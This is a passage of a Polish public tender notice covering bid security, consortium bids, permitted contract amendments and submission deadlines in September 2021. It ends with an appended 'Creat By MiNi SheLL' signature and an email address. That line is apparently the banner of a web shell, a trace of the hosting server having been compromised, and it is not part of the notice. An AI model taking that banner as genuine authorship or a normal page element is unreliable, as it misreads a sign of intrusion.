przelewem na konto w Banku Spółdzielczym Ziem<br/>Górskich KARPATIA nr rachunku 93 8140 0009 0000 0127 2000 0110 z dopiskiem „Wadium –<br/>nr postępowania”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie p.z.p. <br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: <br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58<br/>p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona .<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacje na temat możliwości składania oferty wspólnej (przez dwa lub więcej podmiotów):<br/>a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia, wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>UWAGA:<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą<br/>nazwą, albo z umowy podmiotów składających wspólnie ofertę. <br/>b) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).<br/>Wykonawcy wspólnie ubiegający się o zamówienie muszą udokumentować – przy ofercie - że<br/>pełnomocnictwo ustanowione do ich reprezentowania zostało podpisane przez osobę[y]<br/>uprawnione do działania w ich imieniu.<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o<br/>którym mowa w dziale 6.3 ust. 2), 3), składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub<br/>kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie<br/>podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>d) Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako<br/>pełnomocnik Wykonawców składających wspólną ofertę,<br/>a) Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie będzie ofertą<br/>najkorzystniejszą, wówczas Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego - umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień zawartej umowy mogą nastąpić za zgodą obu Stron wyrażoną na piśmie,<br/>w formie aneksu do umowy, pod rygorem nieważności. Zmiany umowy muszą być zgodne z<br/>treścią art. 455 ustawy Prawo zamówień publicznych oraz zapisami niniejszej umowy. <br/>2. Strony zastrzegają sobie możliwość zmiany treści umowy, w przypadkach wskazanych<br/>powyżej oraz w następujących przypadkach:<br/>a) konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający,<br/>działając z należytą starannością, nie mógł przewidzieć a wartość zmiany nie przekracza 50%<br/>wartości zamówienia określonej pierwotnie w umowie;<br/>b) w przypadku wystąpienia „siły wyższej” lub innego zdarzenia losowego;<br/>c) w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu<br/>realizacji jakiegokolwiek elementu Przedmiotu Umowy;<br/>d) w przypadku zmiany terminu realizacji Umowy, spowodowanego przerwą w realizacji<br/>Przedmiotu Umowy, z przyczyn leżących po stronie Zamawiającego lub z przyczyn niezależnych od Wykonawcy (w szczególności wydłużenie się postępowania administracyjnego lub innego<br/>celem uzyskania decyzji, opinii, uzgodnień) pod warunkiem, jeżeli przerwa w realizacji<br/>Przedmiotu Umowy zostanie pisemnie stwierdzona oraz umotywowana przez Wykonawcę;<br/>e) kiedy Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca<br/>w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia<br/>warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie<br/>pociąga to za sobą innych istotnych zmian umowy;<br/>f) zmiany terminu realizacji umowy: w przypadku gdy na skutek potrzeb / przyczyn leżących po<br/>stronie Zamawiającego spowodowanych koniecznością zachowania bieżącego funkcjonowania<br/>poszczególnych komórek organizacyjnych Zamawiającego nastąpi przerwa w realizacji<br/>poszczególnych części Przedmiotu Umowy;<br/>g) w przypadku gdy z przyczyn technicznych, społecznych, sytuacji pogodowej, nie jest możliwe<br/>wykonanie poszczególnych robót budowalnych celem wykonania należycie Przedmiotu Umowy,<br/>lub gdy od wyniku działania innych podmiotów, nie związanych z realizacją niniejszego<br/>przedmiotu umowy albo Zamawiającego uzależnione jest wykonanie należycie Przedmiotu<br/>Umowy;<br/>h) w przypadku rezygnacji przez Zamawiającego z realizacji części Przedmiotu Umowy, zgodnie<br/>z zapisami niniejszej umowy powyżej;<br/>i) w przypadku konieczności wydłużenia okresu gwarancji lub rękojmi.<br/>3. Strona wnioskująca o zmianę Umowy występuje do drugiej Strony z pisemnym wnioskiem o<br/>zmianę Umowy zawierającym zakres zmiany wraz z uzasadnieniem oraz informacją, co do<br/>wpływu na warunki realizacji Umowy. Druga Strona w terminie 14 dni pisemnie ustosunkowuje<br/>się do wniosku o zmianę Umowy. <br/>4. Wszelkie zmiany i uzupełnienia Umowy wymagają zachowania formy pisemnej pod rygorem<br/>nieważności.<br/>5. Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których<br/>mowa w ust. 1, wpływają na należyte wykonanie umowy, w uzgodnieniu z wykonawcą dokonuje<br/>zmiany umowy, o której mowa w art. 455 ust. 1 pkt 4 ustawy z dnia 11 września 2019 r. - Prawo<br/>zamówień publicznych, w szczególności przez:<br/>1) zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania<br/>umowy lub jej części,<br/>2) zmianę sposobu wykonywania dostaw, usług lub robót budowlanych,<br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub<br/>sposobu rozliczenia wynagrodzenia wykonawcy,<br/>- o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości<br/>pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com